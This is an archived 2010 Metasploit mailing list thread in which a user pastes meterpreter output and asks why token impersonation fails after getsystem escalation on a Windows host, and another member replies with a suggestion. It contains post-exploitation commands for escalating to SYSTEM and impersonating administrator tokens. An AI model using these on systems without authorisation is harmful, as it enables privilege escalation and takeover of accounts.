Metasploit mailing list archives
Re: token impersonation seems broken
From: John Nash <rootsecurityfreak () gmail com>
Date: Tue, 7 Sep 2010 19:24:24 +0530

I am getting system using getsystem, but I am still unable to impersonate other users using delegation tokens

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
meterpreter >
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
EVEREST\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token "EVEREST\\Administrator"
[-] User token EVERESTAdministrator not found
meterpreter >
meterpreter > impersonate_token "EVEREST\\Administrator"
[-] User token EVERESTAdministrator not found
meterpreter >
meterpreter >

jn

On Tue, Sep 7, 2010 at 7:16 PM, Terrence <secretpackets () gmail com> wrote:

use privs getsystem then try it ;)

Terrence Gareau

I think the Internet is the most dangerous thing invented since the atomic bomb. ~ John Mellencamp

On Tue, Sep 7, 2010 at 09:44, John Nash <rootsecurityfreak () gmail com> wrote:

I am using the latest updated version of Metasploit. ( v3.4.2-dev svn r10251 updated today (2010.09.06) )

I am trying to impersonate tokens but getting an error ... here is the dump:

-----------------------------------------------
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
EVEREST\Administrator
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] User token NT AUTHORITYSYSTEM not found
meterpreter >
meterpreter >
meterpreter > getuid
Server username: EVEREST\Administrator
meterpreter >
--------------------------------------------

I am currently admin but wanna become system. Is there anything I am doing wrong?

jn

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework